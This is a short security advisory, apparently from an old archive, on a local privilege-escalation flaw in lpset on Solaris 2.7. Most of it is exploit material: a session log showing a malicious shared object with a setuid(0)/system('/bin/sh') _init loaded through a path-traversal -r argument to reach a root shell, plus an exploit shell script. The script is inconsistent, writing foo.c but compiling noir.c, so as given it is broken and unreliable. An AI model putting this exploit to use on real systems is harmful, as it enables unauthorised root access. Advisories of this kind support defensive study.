COMMAND

    lpset

SYSTEMS AFFECTED

    Solaris/SPARC 2.7

PROBLEM

    noir posted following.   lpset seems to  use strcat() to  pass the
    argument for -r flag (/usr/lib/print/lib/../../../../tmp/foo)  and
    appends .so to the end.   In this case /tmp/foo.so is going  to be
    dlopen but  there is  a special  case /usr/lib/print/lib directory
    has to exist.  Exploit shell script is attached.

        $ uname -a
        SunOS karate 5.7 Generic_106541-07 sun4u sparc SUNW,Ultra-5_10
        $ id
        uid=118(noir) gid=120(boha)
        $ cd /tmp
        $ cat > foo.c
        #include <stdlib.h>
        #include <unistd.h>
        void
        _init(void)
        {
        setuid(0);
        system("/bin/sh");
        }
        ^C$ /usr/local/bin/gcc -fPIC -c foo.c -g -DSOLARIS -Wall
        $ ld -G -o foo.so foo.o -ldl
        $ lpset -n xfn -r /../../../../tmp/foo foo
        # id
        uid=0(root) gid=120(boha)
        #

    lpset shell script:

    #!/bin/sh
    #
    # /usr/bin/lpset vulnerability in Solaris/SPARC 2.7
    # script by noir@gsu.linux.org.tr
    #
    # lpset seems to use strcat to append paths (-r)
    # but there is a special case /usr/lib/print/lib has to be present
    #
    
    cat > foo.c << EOF
    #include <stdlib.h>
    #include <unistd.h>
    void
    _init(void)
    {
	    setuid(0);
	    system("/bin/sh");
    }
    EOF
    
    echo "Compiling ..."
    
    gcc -fPIC -c noir.c -g -DSOLARIS -Wall
    ld -G -o noir.so noir.o -ldl
    
    chmod 755 noir.so
    
    rm -f noir.c
    rm -f noir.o
    
    /usr/bin/lpset -n xfn -r /../../../..$PWD/noir noir

SOLUTION

    Patch in progress.